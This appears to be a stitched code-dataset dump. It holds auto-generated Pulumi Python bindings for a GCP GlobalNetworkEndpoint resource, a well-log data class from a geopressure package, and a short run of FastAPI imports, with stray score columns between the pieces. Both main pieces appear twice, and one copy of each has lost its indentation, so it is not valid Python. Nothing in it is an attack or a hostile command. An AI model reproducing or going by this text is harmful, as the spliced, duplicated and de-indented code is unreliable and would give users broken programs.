        ```sh
        $ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{project}}/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
        ```
        ```sh
        $ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
               This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        :param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
        :param pulumi.Input[str] ip_address: IPv4 address external endpoint.
        :param pulumi.Input[int] port: Port number of the external endpoint.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: GlobalNetworkEndpointArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        A Global Network endpoint represents a IP address and port combination that exists outside of GCP.
        **NOTE**: Global network endpoints cannot be created outside of a
        global network endpoint group.
        To get more information about GlobalNetworkEndpoint, see:
        * [API documentation](https://cloud.google.com/compute/docs/reference/rest/beta/networkEndpointGroups)
        * How-to Guides
            * [Official Documentation](https://cloud.google.com/load-balancing/docs/negs/)
        ## Example Usage
        ### Global Network Endpoint
        ```python
        import pulumi
        import pulumi_gcp as gcp
        neg = gcp.compute.GlobalNetworkEndpointGroup("neg",
            default_port=90,
            network_endpoint_type="INTERNET_FQDN_PORT")
        default_endpoint = gcp.compute.GlobalNetworkEndpoint("default-endpoint",
            global_network_endpoint_group=neg.name,
            fqdn="www.example.com",
            port=90)
        ```
        ## Import
        GlobalNetworkEndpoint can be imported using any of these accepted formats
        ```sh
        $ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default projects/{{project}}/global/networkEndpointGroups/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
        ```
        ```sh
        $ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{project}}/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
        ```
        ```sh
        $ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
        ```
        :param str resource_name: The name of the resource.
        :param GlobalNetworkEndpointArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: either a typed args object
        # or individual keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(GlobalNetworkEndpointArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 fqdn: Optional[pulumi.Input[str]] = None,
                 global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: validate required properties (unless the
            # engine supplies a URN, in which case values come from state).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = GlobalNetworkEndpointArgs.__new__(GlobalNetworkEndpointArgs)
            __props__.__dict__["fqdn"] = fqdn
            if global_network_endpoint_group is None and not opts.urn:
                raise TypeError("Missing required property 'global_network_endpoint_group'")
            __props__.__dict__["global_network_endpoint_group"] = global_network_endpoint_group
            __props__.__dict__["ip_address"] = ip_address
            if port is None and not opts.urn:
                raise TypeError("Missing required property 'port'")
            __props__.__dict__["port"] = port
            __props__.__dict__["project"] = project
        super(GlobalNetworkEndpoint, __self__).__init__(
            'gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            fqdn: Optional[pulumi.Input[str]] = None,
            global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
            ip_address: Optional[pulumi.Input[str]] = None,
            port: Optional[pulumi.Input[int]] = None,
            project: Optional[pulumi.Input[str]] = None) -> 'GlobalNetworkEndpoint':
        """
        Get an existing GlobalNetworkEndpoint resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
               This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        :param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
        :param pulumi.Input[str] ip_address: IPv4 address external endpoint.
        :param pulumi.Input[int] port: Port number of the external endpoint.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _GlobalNetworkEndpointState.__new__(_GlobalNetworkEndpointState)
        __props__.__dict__["fqdn"] = fqdn
        __props__.__dict__["global_network_endpoint_group"] = global_network_endpoint_group
        __props__.__dict__["ip_address"] = ip_address
        __props__.__dict__["port"] = port
        __props__.__dict__["project"] = project
        return GlobalNetworkEndpoint(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def fqdn(self) -> pulumi.Output[Optional[str]]:
        """
        Fully qualified domain name of network endpoint.
        This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        """
        return pulumi.get(self, "fqdn")
    @property
    @pulumi.getter(name="globalNetworkEndpointGroup")
    def global_network_endpoint_group(self) -> pulumi.Output[str]:
        """
        The global network endpoint group this endpoint is part of.
        """
        return pulumi.get(self, "global_network_endpoint_group")
    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> pulumi.Output[Optional[str]]:
        """
        IPv4 address external endpoint.
        """
        return pulumi.get(self, "ip_address")
    @property
    @pulumi.getter
    def port(self) -> pulumi.Output[int]:
        """
        Port number of the external endpoint.
        """
        return pulumi.get(self, "port")
    @property
    @pulumi.getter
    def project(self) -> pulumi.Output[str]:
        """
        The ID of the project in which the resource belongs.
        If it is not provided, the provider project is used.
        """
        return pulumi.get(self, "project")
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['GlobalNetworkEndpointArgs', 'GlobalNetworkEndpoint']
# Auto-generated input-args class; @pulumi.input_type introspects the
# __init__ signature and the @pulumi.getter-decorated properties below,
# so the structure of this class must not be altered.
@pulumi.input_type
class GlobalNetworkEndpointArgs:
    def __init__(__self__, *,
                 global_network_endpoint_group: pulumi.Input[str],
                 port: pulumi.Input[int],
                 fqdn: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 project: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a GlobalNetworkEndpoint resource.
        :param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
        :param pulumi.Input[int] port: Port number of the external endpoint.
        :param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
               This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        :param pulumi.Input[str] ip_address: IPv4 address external endpoint.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        """
        # Required arguments are always set; optional ones only when provided,
        # so that absent values remain unset rather than explicitly None.
        pulumi.set(__self__, "global_network_endpoint_group", global_network_endpoint_group)
        pulumi.set(__self__, "port", port)
        if fqdn is not None:
            pulumi.set(__self__, "fqdn", fqdn)
        if ip_address is not None:
            pulumi.set(__self__, "ip_address", ip_address)
        if project is not None:
            pulumi.set(__self__, "project", project)
    @property
    @pulumi.getter(name="globalNetworkEndpointGroup")
    def global_network_endpoint_group(self) -> pulumi.Input[str]:
        """
        The global network endpoint group this endpoint is part of.
        """
        return pulumi.get(self, "global_network_endpoint_group")
    @global_network_endpoint_group.setter
    def global_network_endpoint_group(self, value: pulumi.Input[str]):
        pulumi.set(self, "global_network_endpoint_group", value)
    @property
    @pulumi.getter
    def port(self) -> pulumi.Input[int]:
        """
        Port number of the external endpoint.
        """
        return pulumi.get(self, "port")
    @port.setter
    def port(self, value: pulumi.Input[int]):
        pulumi.set(self, "port", value)
    @property
    @pulumi.getter
    def fqdn(self) -> Optional[pulumi.Input[str]]:
        """
        Fully qualified domain name of network endpoint.
        This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        """
        return pulumi.get(self, "fqdn")
    @fqdn.setter
    def fqdn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "fqdn", value)
    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> Optional[pulumi.Input[str]]:
        """
        IPv4 address external endpoint.
        """
        return pulumi.get(self, "ip_address")
    @ip_address.setter
    def ip_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ip_address", value)
    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the project in which the resource belongs.
        If it is not provided, the provider project is used.
        """
        return pulumi.get(self, "project")
    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)
# Auto-generated state class used by GlobalNetworkEndpoint.get(); every field
# is optional because lookups may filter on any subset of properties.
@pulumi.input_type
class _GlobalNetworkEndpointState:
    def __init__(__self__, *,
                 fqdn: Optional[pulumi.Input[str]] = None,
                 global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 project: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering GlobalNetworkEndpoint resources.
        :param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
               This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        :param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
        :param pulumi.Input[str] ip_address: IPv4 address external endpoint.
        :param pulumi.Input[int] port: Port number of the external endpoint.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        """
        # Only set properties that were actually provided so unset values stay absent.
        if fqdn is not None:
            pulumi.set(__self__, "fqdn", fqdn)
        if global_network_endpoint_group is not None:
            pulumi.set(__self__, "global_network_endpoint_group", global_network_endpoint_group)
        if ip_address is not None:
            pulumi.set(__self__, "ip_address", ip_address)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if project is not None:
            pulumi.set(__self__, "project", project)
    @property
    @pulumi.getter
    def fqdn(self) -> Optional[pulumi.Input[str]]:
        """
        Fully qualified domain name of network endpoint.
        This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        """
        return pulumi.get(self, "fqdn")
    @fqdn.setter
    def fqdn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "fqdn", value)
    @property
    @pulumi.getter(name="globalNetworkEndpointGroup")
    def global_network_endpoint_group(self) -> Optional[pulumi.Input[str]]:
        """
        The global network endpoint group this endpoint is part of.
        """
        return pulumi.get(self, "global_network_endpoint_group")
    @global_network_endpoint_group.setter
    def global_network_endpoint_group(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "global_network_endpoint_group", value)
    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> Optional[pulumi.Input[str]]:
        """
        IPv4 address external endpoint.
        """
        return pulumi.get(self, "ip_address")
    @ip_address.setter
    def ip_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ip_address", value)
    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """
        Port number of the external endpoint.
        """
        return pulumi.get(self, "port")
    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)
    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the project in which the resource belongs.
        If it is not provided, the provider project is used.
        """
        return pulumi.get(self, "project")
    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)
class GlobalNetworkEndpoint(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A Global Network endpoint represents a IP address and port combination that exists outside of GCP.
**NOTE**: Global network endpoints cannot be created outside of a
global network endpoint group.
To get more information about GlobalNetworkEndpoint, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/beta/networkEndpointGroups)
* How-to Guides
* [Official Documentation](https://cloud.google.com/load-balancing/docs/negs/)
## Example Usage
### Global Network Endpoint
```python
import pulumi
import pulumi_gcp as gcp
neg = gcp.compute.GlobalNetworkEndpointGroup("neg",
default_port=90,
network_endpoint_type="INTERNET_FQDN_PORT")
default_endpoint = gcp.compute.GlobalNetworkEndpoint("default-endpoint",
global_network_endpoint_group=neg.name,
fqdn="www.example.com",
port=90)
```
## Import
GlobalNetworkEndpoint can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default projects/{{project}}/global/networkEndpointGroups/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{project}}/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GlobalNetworkEndpointArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A Global Network endpoint represents a IP address and port combination that exists outside of GCP.
**NOTE**: Global network endpoints cannot be created outside of a
global network endpoint group.
To get more information about GlobalNetworkEndpoint, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/beta/networkEndpointGroups)
* How-to Guides
* [Official Documentation](https://cloud.google.com/load-balancing/docs/negs/)
## Example Usage
### Global Network Endpoint
```python
import pulumi
import pulumi_gcp as gcp
neg = gcp.compute.GlobalNetworkEndpointGroup("neg",
default_port=90,
network_endpoint_type="INTERNET_FQDN_PORT")
default_endpoint = gcp.compute.GlobalNetworkEndpoint("default-endpoint",
global_network_endpoint_group=neg.name,
fqdn="www.example.com",
port=90)
```
## Import
GlobalNetworkEndpoint can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default projects/{{project}}/global/networkEndpointGroups/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{project}}/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
:param str resource_name: The name of the resource.
:param GlobalNetworkEndpointArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GlobalNetworkEndpointArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GlobalNetworkEndpointArgs.__new__(GlobalNetworkEndpointArgs)
__props__.__dict__["fqdn"] = fqdn
if global_network_endpoint_group is None and not opts.urn:
raise TypeError("Missing required property 'global_network_endpoint_group'")
__props__.__dict__["global_network_endpoint_group"] = global_network_endpoint_group
__props__.__dict__["ip_address"] = ip_address
if port is None and not opts.urn:
raise TypeError("Missing required property 'port'")
__props__.__dict__["port"] = port
__props__.__dict__["project"] = project
super(GlobalNetworkEndpoint, __self__).__init__(
'gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None) -> 'GlobalNetworkEndpoint':
"""
Get an existing GlobalNetworkEndpoint resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _GlobalNetworkEndpointState.__new__(_GlobalNetworkEndpointState)
__props__.__dict__["fqdn"] = fqdn
__props__.__dict__["global_network_endpoint_group"] = global_network_endpoint_group
__props__.__dict__["ip_address"] = ip_address
__props__.__dict__["port"] = port
__props__.__dict__["project"] = project
return GlobalNetworkEndpoint(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def fqdn(self) -> pulumi.Output[Optional[str]]:
"""
Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
"""
return pulumi.get(self, "fqdn")
@property
@pulumi.getter(name="globalNetworkEndpointGroup")
def global_network_endpoint_group(self) -> pulumi.Output[str]:
"""
The global network endpoint group this endpoint is part of.
"""
return pulumi.get(self, "global_network_endpoint_group")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> pulumi.Output[Optional[str]]:
"""
IPv4 address external endpoint.
"""
return pulumi.get(self, "ip_address")
@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
"""
Port number of the external endpoint.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project") | 0.859678 | 0.055183 |
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from builtins import zip, open
__author__ = "yuhao"
import numpy as np
import matplotlib.pyplot as plt
class Log(object):
"""
class for well log data
"""
def __init__(self, file_name=None, log_name="unk"):
"""
Parameters
----------
file_name : str
pseudo las file path
log_name : str
log name to create
"""
self.name = log_name
self.units = ""
self.descr = ""
self.prop_type = None
self.__data = []
self.__depth = []
self.log_start = None
self.log_stop = None
self.depth_start = None
self.depth_stop = None
self.log_start_idx = None
self.log_stop_idx = None
if file_name is not None:
self.__init_from_file(file_name)
@classmethod
def from_scratch(cls, depth, data, name=None, units=None, descr=None,
prop_type=None):
log = cls()
log.depth = np.array(depth)
log.data = np.array(data)
log.name = name
log.units = units
log.descr = descr
log.prop_type = prop_type
return log
def __init_from_file(self, file_name):
self._read_od(file_name)
try:
shorthand = self.descr[:3].lower()
self.name = shorthand + "_unk"
prop_dict = {
'vel': 'VEL',
'den': 'DEN',
'sha': 'VSH',
'ove': 'PRE',
'pre': 'PRE'
}
try:
self.prop_type = prop_dict[shorthand]
except KeyError:
pass
except IndexError:
self.name = "unk_unk"
def __len__(self):
return len(self.__data)
def __str__(self):
return "Well_Log:{}({}[{}])".format(self.name, self.descr, self.units)
def __bool__(self):
return bool(bool(self.__depth) and bool(self.__data))
def __eq__(self, other):
return self.depth == other.depth and self.data == other.data
@property
def depth(self):
"depth data of the log"
return list(self.__depth)
@depth.setter
def depth(self, values):
self.__depth = list(values)
@property
def data(self):
"property data of the log"
return list(self.__data)
@data.setter
def data(self, values):
self.__data = list(values)
@property
def start(self):
"start depth of available property data"
if self.log_start is None:
for dep, dat in zip(self.__depth, self.__data):
if np.isfinite(dat):
self.log_start = dep
break
return self.log_start
@property
def start_idx(self):
"start index of available property data"
if self.log_start_idx is None:
self.__data = np.array(self.__data)
mask = np.isfinite(self.__data)
index = np.where(mask == True)
self.log_start_idx = index[0][0]
return self.log_start_idx
@property
def stop(self):
"end depth of available property data"
if self.log_stop is None:
for dep, dat in zip(reversed(self.__depth), reversed(self.__data)):
if np.isfinite(dat):
self.log_stop = dep
break
return self.log_stop
@property
def stop_idx(self):
"end index of available property data"
if self.log_stop_idx is None:
self.__data = np.array(self.__data)
mask = np.isfinite(self.__data)
index = np.where(mask == True)
self.log_stop_idx = index[0][-1] + 1
# so when used in slice, +1 will not needed.
return self.log_stop_idx
@property
def top(self):
"top depth of this log"
return self.__depth[0]
@property
def bottom(self):
"bottom depth of this log"
return self.__depth[-1]
def _read_od(self, file_name):
try:
with open(file_name, "r") as fin:
info_list = fin.readline().split('\t')
temp_list = info_list[-1].split('(')
self.descr = temp_list[0]
self.units = temp_list[1][:-2]
for line in fin:
tempList = line.split()
self.__depth.append(round(float(tempList[0]), 1))
if tempList[1] == "1e30":
self.__data.append(np.nan)
else:
self.__data.append(float(tempList[1]))
except Exception as inst:
print('{}: '.format(self.name))
print(inst.args)
def to_las(self, file_name):
"""
Save as pseudo-las file
"""
try:
with open(file_name, 'w') as fout:
split_list = self.descr.split(' ')
description = '_'.join(split_list)
fout.write("Depth(m)\t" + description + "(" + self.units + ")\n")
for d, v in zip(self.__depth, self.__data):
d = str(d)
v = str(v) if np.isfinite(v) else "1e30"
fout.write("\t".join([d, v]) + "\n")
except Exception as inst:
print(inst.args)
def get_depth_idx(self, d):
"return index of depth"
if d > self.bottom or d < self.top:
return None
else:
return int((d - self.top) // 0.1)
def get_data(self, depth):
"get data at certain depth"
depth_idx = list()
for de in depth:
depth_idx.append(self.get_depth_idx(de))
log_depth = np.array(self.__depth)
log_data = np.array(self.__data)
mask = log_depth < 0
for idx in depth_idx:
if idx is not None:
mask[idx] = True
return log_data[mask]
def get_resampled(self, rate):
"return resampled log"
standard_log_step = 0.1
step = int(rate // standard_log_step) + 1
log = Log()
log.depth = self.depth[::step]
log.data = self.data[::step]
return log
def plot(self, ax=None, color='gray', linewidth=0.5, linestyle='-',
label=None, zorder=1):
"""
Plot log curve
Parameters
----------
ax : matplotlib.axes._subplots.AxesSubplot
axis object to plot on, a new axis will be created if not provided
Returns
-------
matplotlib.axes._subplots.AxesSubplot
"""
if ax is None:
_, ax = plt.subplots()
ax.invert_yaxis()
if label is None:
label = self.descr
ax.plot(self.data, self.depth, linewidth=linewidth, color=color,
linestyle=linestyle, label=label, zorder=zorder)
ax.set(xlabel="{}({})".format(self.descr, self.units),
ylabel="Depth(m)",
title=self.name)
return ax | pygeopressure/basic/well_log.py | from __future__ import (absolute_import, division, print_function,
unicode_literals)
from builtins import zip, open
__author__ = "yuhao"
import numpy as np
import matplotlib.pyplot as plt
class Log(object):
"""
class for well log data
"""
def __init__(self, file_name=None, log_name="unk"):
"""
Parameters
----------
file_name : str
pseudo las file path
log_name : str
log name to create
"""
self.name = log_name
self.units = ""
self.descr = ""
self.prop_type = None
self.__data = []
self.__depth = []
self.log_start = None
self.log_stop = None
self.depth_start = None
self.depth_stop = None
self.log_start_idx = None
self.log_stop_idx = None
if file_name is not None:
self.__init_from_file(file_name)
@classmethod
def from_scratch(cls, depth, data, name=None, units=None, descr=None,
prop_type=None):
log = cls()
log.depth = np.array(depth)
log.data = np.array(data)
log.name = name
log.units = units
log.descr = descr
log.prop_type = prop_type
return log
def __init_from_file(self, file_name):
self._read_od(file_name)
try:
shorthand = self.descr[:3].lower()
self.name = shorthand + "_unk"
prop_dict = {
'vel': 'VEL',
'den': 'DEN',
'sha': 'VSH',
'ove': 'PRE',
'pre': 'PRE'
}
try:
self.prop_type = prop_dict[shorthand]
except KeyError:
pass
except IndexError:
self.name = "unk_unk"
def __len__(self):
return len(self.__data)
def __str__(self):
return "Well_Log:{}({}[{}])".format(self.name, self.descr, self.units)
def __bool__(self):
return bool(bool(self.__depth) and bool(self.__data))
def __eq__(self, other):
return self.depth == other.depth and self.data == other.data
@property
def depth(self):
"depth data of the log"
return list(self.__depth)
@depth.setter
def depth(self, values):
self.__depth = list(values)
@property
def data(self):
"property data of the log"
return list(self.__data)
@data.setter
def data(self, values):
self.__data = list(values)
@property
def start(self):
"start depth of available property data"
if self.log_start is None:
for dep, dat in zip(self.__depth, self.__data):
if np.isfinite(dat):
self.log_start = dep
break
return self.log_start
@property
def start_idx(self):
"start index of available property data"
if self.log_start_idx is None:
self.__data = np.array(self.__data)
mask = np.isfinite(self.__data)
index = np.where(mask == True)
self.log_start_idx = index[0][0]
return self.log_start_idx
@property
def stop(self):
"end depth of available property data"
if self.log_stop is None:
for dep, dat in zip(reversed(self.__depth), reversed(self.__data)):
if np.isfinite(dat):
self.log_stop = dep
break
return self.log_stop
@property
def stop_idx(self):
"end index of available property data"
if self.log_stop_idx is None:
self.__data = np.array(self.__data)
mask = np.isfinite(self.__data)
index = np.where(mask == True)
self.log_stop_idx = index[0][-1] + 1
# so when used in slice, +1 will not needed.
return self.log_stop_idx
@property
def top(self):
"top depth of this log"
return self.__depth[0]
@property
def bottom(self):
"bottom depth of this log"
return self.__depth[-1]
def _read_od(self, file_name):
try:
with open(file_name, "r") as fin:
info_list = fin.readline().split('\t')
temp_list = info_list[-1].split('(')
self.descr = temp_list[0]
self.units = temp_list[1][:-2]
for line in fin:
tempList = line.split()
self.__depth.append(round(float(tempList[0]), 1))
if tempList[1] == "1e30":
self.__data.append(np.nan)
else:
self.__data.append(float(tempList[1]))
except Exception as inst:
print('{}: '.format(self.name))
print(inst.args)
def to_las(self, file_name):
"""
Save as pseudo-las file
"""
try:
with open(file_name, 'w') as fout:
split_list = self.descr.split(' ')
description = '_'.join(split_list)
fout.write("Depth(m)\t" + description + "(" + self.units + ")\n")
for d, v in zip(self.__depth, self.__data):
d = str(d)
v = str(v) if np.isfinite(v) else "1e30"
fout.write("\t".join([d, v]) + "\n")
except Exception as inst:
print(inst.args)
def get_depth_idx(self, d):
"return index of depth"
if d > self.bottom or d < self.top:
return None
else:
return int((d - self.top) // 0.1)
def get_data(self, depth):
"get data at certain depth"
depth_idx = list()
for de in depth:
depth_idx.append(self.get_depth_idx(de))
log_depth = np.array(self.__depth)
log_data = np.array(self.__data)
mask = log_depth < 0
for idx in depth_idx:
if idx is not None:
mask[idx] = True
return log_data[mask]
def get_resampled(self, rate):
"return resampled log"
standard_log_step = 0.1
step = int(rate // standard_log_step) + 1
log = Log()
log.depth = self.depth[::step]
log.data = self.data[::step]
return log
def plot(self, ax=None, color='gray', linewidth=0.5, linestyle='-',
label=None, zorder=1):
"""
Plot log curve
Parameters
----------
ax : matplotlib.axes._subplots.AxesSubplot
axis object to plot on, a new axis will be created if not provided
Returns
-------
matplotlib.axes._subplots.AxesSubplot
"""
if ax is None:
_, ax = plt.subplots()
ax.invert_yaxis()
if label is None:
label = self.descr
ax.plot(self.data, self.depth, linewidth=linewidth, color=color,
linestyle=linestyle, label=label, zorder=zorder)
ax.set(xlabel="{}({})".format(self.descr, self.units),
ylabel="Depth(m)",
title=self.name)
return ax | 0.750553 | 0.192312 |
from fastapi import FastAPI, HTTPException, Depends, Security
from models.api_permission import APIPermission
from fastapi.security.api_key import APIKeyHeader
from fastapi import FastAPI
from fastapi.security.api_key import APIKeyHeader
import uvicorn
from core.auth_repository import AuthRepository
